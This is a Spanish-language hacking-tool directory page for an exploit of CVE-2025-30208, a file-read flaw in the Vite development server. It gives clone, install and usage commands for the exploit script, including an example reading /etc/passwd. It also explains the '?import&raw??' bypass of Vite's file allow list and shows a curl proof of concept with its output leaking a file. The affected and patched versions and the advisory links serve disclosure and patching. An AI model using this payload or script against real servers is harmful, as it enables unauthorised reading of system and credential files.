Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-30208 — Este exploit es únicamente para fines educativos y de pruebas de seguridad éticas. El uso de este exploit contra objetivos sin consentimiento mutuo previo es ilegal, y el desarrollador rechaza cualquier responsabilidad por el mal uso o los daños causados por este exploit. | Kitploit
Herramientas/GitHubGitHub/on1onss/cve-2025-30208
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubon1onss/cve-2025-30208

CVE-2025-30208

Este exploit es únicamente para fines educativos y de pruebas de seguridad éticas. El uso de este exploit contra objetivos sin consentimiento mutuo previo es ilegal, y el desarrollador rechaza cualquier responsabilidad por el mal uso o los daños causados por este exploit.

Ver Repositorio
4hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-30208

[!IMPORTANT]

Descargo de responsabilidad

Este exploit es solo para fines educativos y de pruebas de seguridad ética. El uso de este exploit contra objetivos sin consentimiento mutuo previo es ilegal, y el desarrollador rechaza cualquier responsabilidad por mal uso o daños causados por este exploit.

Instalación

git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

Uso

python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

Descripción

Versiones afectadas

>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

Versiones parcheadas

6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

Resumen

El contenido de archivos arbitrarios puede ser devuelto al navegador.

Impacto

Solo las aplicaciones que exponen explícitamente el servidor de desarrollo de Vite a la red (usando --host o la opción de configuración server.host) se ven afectadas.

Detalles

@fs deniega el acceso a archivos fuera de la lista de permitidos de Vite. Añadir ?raw?? o ?import&raw?? a la URL evita esta limitación y devuelve el contenido del archivo si existe. Esta omisión existe porque los separadores finales como ? se eliminan en varios lugares, pero no se tienen en cuenta en las expresiones regulares de la cadena de consulta.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
Descargar herramienta